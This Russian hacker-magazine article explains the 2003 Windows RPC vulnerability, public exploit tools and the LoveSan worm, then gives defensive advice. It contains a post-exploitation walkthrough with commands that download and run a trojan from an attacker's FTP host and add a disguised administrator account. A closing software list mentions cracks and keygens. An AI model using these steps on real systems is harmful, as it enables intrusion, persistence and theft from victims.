Звонкоголосые модемы

Эксплуатация виндовой RPC-уязвимости

Многие кричат, что винда - это форточка без стекол, намекая на то, что она вся дырявая. Заявление, конечно, громкое, но сейчас с этим сложно не согласиться. Совсем недавно мир узнал о более мощной баге, чем брешь в IIS. В отличие от предыдущей ошибки, эта дает права администратора в винде и полноценный доступ к командному интерпретатору. Причем каждый может быть как в роли жертвы, так и в роли атакующего. Хочешь подробностей? Читай дальше!

И это только начало...

Весточка о бреши в форточках промелькнула 16 июля на сайте www.lsd.pl и почти никого не заинтересовала. Добрый Microsoft вовремя среагировал и уже на следующее утро на официальном сервере находился патч под все платформы с кратким описанием уязвимости. Ровно через шесть дней на сайте Xfocus.org появляется первый эксплоит (http://xfocus.org/advisories/200307/4.html) с шестью таргетами для Win2k и WinXP со всеми сервиспаками. Среди хакеров возникло оживление, но эксплоит был не слишком эффективный, потому как при неверном выборе версии операционки, RPC-служба аварийно завершалась, и взломать систему больше не удавалось - необходима была перезагрузка.

Что интересно, описание уязвимости тоже не приводилось. К эксплоиту прилагалось несколько строк, которые говорили о том, что в коде юзается некорректное обращение к интерфейсу __RemoteGetClassObject. При этом подменяется именованный канал epmapper, а система имперсонируется. После чего будет открыт шелл на 4444 порту удаленной машины. Как я уже говорил, хакер получает права администратора.

Зри в корень!

Но Xfocus внес ясность в проблему. На самом деле уязвимостей в виндах две - локальная и удаленная. Обе они задействованы в эксплоите и являются причиной переполнения буфера. API-функция CoGetInstanceFromFile(), позволяющая создать файл, имеет несколько параметров. Один из них - название файла. Microsoft позаботился о проверке его длины, но только если запрос происходит удаленно. Исходя из этого, невозможно напрямую использовать данную функцию в коде эксплоита. Если же юзать функцию RPC (сервис находится на 135 порту), то ты запросто можешь составить запрос вида "\\servername\c$\itsverylongfilename.txt". Так как винда не проверяет сам параметр, а лишь выделяет под него память, то становится реальным переполнить буфер.

Но и здесь не все так гладко, как кажется на первый взгляд. Для того чтобы передать аргумент API-функции, требуется подменить "\\servername" на что-либо другое (изначально это имя машины). Кроме того, необходимо учесть, что шеллкод не должен иметь определенных символов, по которым происходит проверка в функции GetMachineName(). Это реализуется с помощью специально подобранных адресов возврата. Они зависят от версии операционной системы, и если сгенерированы неверно, RPC-сервис аварийно завершит работу.

Такое описание было выложено на Xfocus. К нему прилагались сложные дампы дизассемблера, чтобы понять, как именно переполняется буфер.

Заморочки со взломом

Для линуксоида существует две проблемы, которые он должен преодолеть до того, как поимеет виндовый шелл.

1. Определить версию системы. С точностью до сервиспака. В противном случае хакер загубит сервис и потеряет жертву.

2. Установить троян, который поможет сохранить акцес к тачке. Дело в том, что эксплуатировать винду можно лишь один раз - при выходе из оболочки RPC-сервис уйдет в даун.

Определить версию винды довольно сложно. Конечно, просканить хост nmap'ом с опцией -O, либо XSpider'ом вполне реально, но, как известно, сканеры не идеальны. А ошибка равна смерти ;), сервис будет загублен, повторный взлом возможен лишь после перезагрузки. Определить OS можно и другим методом. Например, если на сервере светится 5000 порт, то это скорее WinXP, чем Win2k, потому как сервис, следящий за портом, включен по дефолту именно в XP.

Теперь о второй проблеме. Существует множество троянов, которые организуют удаленное управление виндой. Также есть способ "безпрограммного" администрирования, о котором будет сказано ниже. После того, как хакер разобрался в этих двух проблемах, он может применить эксплоит. Если таргет выбран верно, взломщик получит шелл. Перед этим на удаленной системе будет выполнена команда "ver".

Новые творения

Прошло двадцать дней. Юзеры до сих пор не ставят патчи, так как лезут к ним на 135 порт довольно редко. 12 августа некий эстонец (правильно говорят, что они сильно тормознутый народ) портировал RPC-эксплоит под винду, сделав его многопоточным и многоадресовым (www.securitylab.ru/?ID=39592, название бинарника KAHT2). Что это давало? Теперь все кому не лень могли сканить и ломать друг друга. При этом можно было забить на проблему детектирования OS, эксплоит чекал ее сам. С момента выхода Канта наступил рай для скрипткиддисов (они, в основном, и сидят в Windows), ведь для того чтобы сказать программе нужный диапазон, число потоков и нажать кнопку Enter, много ума не надо.

Эксплоит работает следующим образом: в качестве параметров ему задается диапазон IP-адресов и число трэдов. Если бинарник пронюхал дырявую систему, он забиндит на ней порт и соединится. Затем хакеру необходимо каким-то образом остаться в системе (создать шелл, минуя эксплоит). Для этого ставится троян. Подобной заразы в инете пруд пруди. Некоторые, например, юзают Phantom FTPD. По идее, это простой FTP-сервер, но исходя из невидимого запуска и прописки в реестр (либо конфиг), ему присвоили статус трояна.

Теперь о том, как залить бэкдор в систему. Для этого хакер регистрируется на каком-нибудь бесплатном хостинге (например, www.nm.ru) и получает FTP-аккаунт. Он заливает троянца на свой FTP (ссылка на вышеописанный Phantom: http://phantom-server.chat.ru/pfsini2.zip) и запоминает его местонахождение. Далее взломщику необходимо создать небольшой FTP-сценарий на похаканной машине (это куда удобнее, чем путаться во мраке неинтерактивных ответов ftp). Для этого юзается ряд консольных команд:

echo user username password > a

echo type binary >> a

echo get pfsini2.exe >> a

echo quit >> a

Затем нарушитель запускает клиент ftp со следующими параметрами:

ftp -n -s:a host.nm.ru (разумеется, username, password и host.nm.ru взломщик заменит на свои реквизиты).

Если все сделано правильно, хакер успешно закачает трояна на винду. Сразу после этого будет удален файл "a", чтобы не светиться на глазах у жертвы. Теперь необходимо создать конфиг. Конфиг фантома крайне прост. Кладется он в c:\windows\system32.dfx и имеет несколько параметров. В довершение всего взломщик перенесет exe'шник в безопасное место и запустит его. Троянец пропишется в реестре и будет запускаться при каждом старте системы. Теперь достаточно прицепиться к хосту на указанный в конфиге порт, и хакер получит доступ ко всем дискам жертвы без участия сервиса RPC.

Упрощение задачи

Через два дня после выхода консольного KAHT2, некий r3L4x сделал графическую утилиту, позволяющую сканить и эксплуатировать багу (www.securitylab.ru/?ID=39648, название эксплоита: RPC GUI). В довесок к этому программа содержала портативный FTP-сервер. Стало возможным передавать файл прямо с компьютера скрипткиддиса. Действия взломщика сводились к заполнению двух форм и клику по кнопке Scan. Затем хакер нажимал кнопочку "Exploit" и приступал к протрояниванию жертвы. Да, это поистине полезная утилита для скрипткиддисов. Теперь любой, даже тупой виндовозник, может ломать сотни тачек. Торжество для социума ламеров!

Кстати, некоторые любители взломов совмещают KAHT2 и RPC GUI, используя первый в качестве многопоточного сканера, а второй - в роли мини FTP-сервера.

И еще махинации

Юзеры часто обращают внимание на посторонние программы в их процесс-листе. Если они заметят трояна, то сразу удалят его, и хакер останется с носом. Чтобы этого не произошло, взломщик может создать нового пользователя и добавить его в группу "Администраторы". Тогда он поимеет полный доступ к шарам жертвы (директории c$, d$ и т.п.). Для этого достаточно набрать всего две консольные команды:

net user machine c00lpassw0rd /add

net localgroup Администраторы machine /add (или Administrators для английской системы)

Теперь пользователь с именем machine (жертва примет его за системный аккаунт и побоится удалять) будет жить в системе, а хакер сможет удаленно прицепиться к компьютеру по протоколу NetBIOS. Реализует он вышесказанное командой net, выполненной со своего компьютера:

net use disk: \\IPADDRESS\C$

Утилита спросит у взломщика имя пользователя и пароль к шаре. Он вводит аккаунт, который создал выше, и получает все права над файлами диска C:.

Обратная сторона медали

Итак, я описал действия хакера, который может поломать любого виндузятника, используя виндовый эксплоит. Самое интересное, что жертвой можешь оказаться и ты. Разумеется, если у тебя операционка на NT-платформе и открытый 135 порт. К тому же ты можешь невольно оказаться в роли плацдарма для вируса LoveSan, который запросто просканирует сеть и проникнет в твои форточки ;).

Чтобы этого не случилось - прими необходимые меры по защите своего компьютера. В первую очередь, установи патч от мелкомягких. Он находится на сайте Microsoft: www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp. После посещения ссылки выбери свою операционку и нужный язык - тебе будет предоставлен необходимый патч. Его размер колеблется от 700 до 1500 килобайт.

Во-вторых, защитись фаерволом. Даже с установленным патчем червяк может разрушить RPC-сервис. Если тебе в лом устанавливать внешние брандмауеры, воспользуйся стандартной XP-защитой. Для этого следует перейти в свойства твоего удаленного соединения и выбрать вкладку "Настройка фаервола". Там задай правило, запрещающее входящие коннекты со 135 портом локальной машины. После этого ты будешь находиться в относительной безопасности.

При активном вирусе LoveSan, который ты возможно уже подхватил, никакой патч и фаервол не спасает. Чтобы избавить себя от обременяющей заразы, просмотри все ключи реестра, отвечающие за автозапуск приложений (либо заюзай утилиту msconfig в WinXP). После удаления червя из автостарта, следует выполнить перезагрузку машины и стереть файл msblast.exe в каталоге Windows.

Когда все это кончится?

Никогда! Ты в курсе, что серверов с бажным IIS в инете до фига. То же самое будет и с RPC. Новые юзеры, установившие себе WinXP, будут подвержены нападению хакеров или червей. Вирусы, которые уже проникли на крупные сервера, проживут там долгие месяцы, а то и годы, при этом атака на www.windowsupdate.com будет продолжаться... а потом багоискатели найдут очередную дыру в форточках ;).

Я верю, что ты проникся всей сложностью ситуации и немедленно проверишь свою машину на RPC-уязвимость. В противном случае, случайный хакер или червь сделает это за тебя. Так что займись своей защитой!

Другие трояны

Возможно, доступа к FTP хакеру покажется мало. Тогда взломщик может применить и другие трояны, к примеру, известный троян "Смерть ламера". Либо скачать утилиту для запуска файлов с сайта http://phantom-server.chat.ru. А вообще троянских коней в инете очень много, достаточно посетить сайты подобной тематики.

LoveSan валит систему

Немаловажным симптомом заражения LoveSan'ом являются частые ошибки сервиса RPC. Они критические, при их появлении высвечивается окошко с предупреждением о том, что компьютер уйдет в ребут через минуту. Довольно неприятное зрелище :).

Как обнаружить, что твою систему пытаются поломать?

Если у тебя есть подозрение, что тебя кто-то хочет поломать, то ты можешь узнать IP-адрес возможного взломщика. Для этого набери команду netstat -an | find "ESTABLISHED", и получишь всю информацию об активных подключениях.

Подвижная зараза

После выхода виндового эксплоита, в Сеть был запущен червячок LoveSan. Он беспорядочно сканил интернет на наличие жертв. За два дня вирус скопировал себя на 12 тысяч машин. Этим он похож на CodeRed, который лез на винду через брешь в IIS. К тому же LoveSan планировал провести атаку. Новый червяк выбрал в качестве жертвы www.windowsupdate.com. Атака намечалась на 16 августа и была бы проведена, но мелкомягкие просто удалили хост www.windowsupdate.com.

А 20 числа вышел еще один червь Blaster. Этот красавец убивает LoveSan и патчит багу в RPC :). Подобное было и с CodeRed - после его выхода был запущен некий вирус CodeGreen, удаляющий CodeRed.

Журнал "Хакер"

Софт для закачки файлов (прямые сылки)

• Download Accelerator Plus 5.3.0.0 (1709 Kb) - один из самых популярных, особенно за рубежом, программ для скачивания файлов. В новую версию добавлена возможность предварительного просмотра содержимого Zip файлов, возможность загрузки отдельних файлов из архивов и др. Есть плагин для Opera. (Русификация - Crack (18Kb); Shareware; Win 9x/Me/2000/XP)
• Download Mage 1.85c (278 Kb) - Компактная программа для скачивания файлов. (Русификация; Плагин (16Kb) для Netscape 6 и Opera; Shareware; Win 9x/Me/2000/XP)
• Express WebPictures v1.85 (1164 Kb) - программа для быстрой загрузки рисунков из Интернета. С ее помощью можно быстро скачать все изображения с интересующего вас сайта, только указав его адрес. (Shareware; Win 9x/Me/2000/XP)
• FlashGet 1.40 (1729 Kb) - Один из лучших менеджеров загрузки файлов. Что нового в версии 1.40: Теперь поддерживает протокол Https. Добавлен экспорт и импорт списков прокси серверов. (Keygen (33Kb); Shareware; Win 9x/Me/2000/XP)
• Fresh Download 5.90 (1414 Kb) - бесплатный (необходимо на сайте программы оставить адрес e-mail, куда будет выслан ключ) менеджер закачек файлов с возможностью докачки, интеграцией с IE и NN. (FreshDownload key; Freeware; Win 9x/Me/2000/XP)
• GetRight 5.0.2 (2451 Kb) - Один из лучших менеджеров загрузки файлов. (Shareware; Win 9x/Me/2000/XP)
• Go!Zilla 4.11.39 (4025 Kb) - Новая версия известной программы для скачивания файлов. (Shareware; Win 9x/Me/2000/XP)
• Mass Downloader 2.6.398 (1165 Kb) - программа для скачивания файлов из Интернета. Поддерживает докачку и закачку по частям, позволяет просматривать Zip архивы не скачивая файл. (Shareware; Win 9x/Me/2000/XP)
• NetAnts 1.25 (1129 Kb) - Новая версия менеджера закачки файлов, поддерживающего интеграцию с NetCaptor и Opera. (Shareware; Win 9x/Me/2000/XP)
• Net Vampire 4.0 (707 Kb) - мощный менеджер загрузки файлов. С версии 4.0 поддерживает загрузку по протоколу (HTTPS). Есть русский интерфейс. (Shareware; Win 9x/Me/2000/XP)
• Picture Pump 1.8 (302 Kb) - бесплатная специализированная программа для скачивания графических файлов с сайтов. (Freeware; Win 9x/Me/2000/XP)
• ReGet Junior 2.2 build 157 (1445 Kb) - это быстрый и простой в использовании менеджер закачек, особенно удобный для новичков в сети. (Shareware; Win 9x/Me/2000/XP)
• ReGet Deluxe 3.3 Build 182 (1509 Кb) - Новая версия популярного менеджера загрузки файлов. Новые возможности версии 3.2: Дополнительная панель инструментов для Internet Explorer предоставляет доступ к функциям ReGet Deluxe без необходимости разворачивать главное окно программы. Улучшена обработка cookies. Исправлены ошибки. (Shareware; Win 9x/Me/2000/XP)
• ReGet Pro 3.3 Build 179 (1067 Кb) - Облегченная версия ReGet Deluxe. Не включает Поиск и FTP броузер, за счет чего имеет меньший размер и более прост в использовании. (Shareware; Win 9x/Me/2000/XP)
• Star Downloader 1.42 (1402 Kb) - Бесплатный менеджер загрузки файлов. Поддерживает докачку, планировку заданий, интеграцию с антивирусной программой. Имеет встроенный распаковщик, который может разархивировать и установить скачанный Zip-файл. Есть русский интерфейс. (Freeware; Win 9x/Me/2000/XP)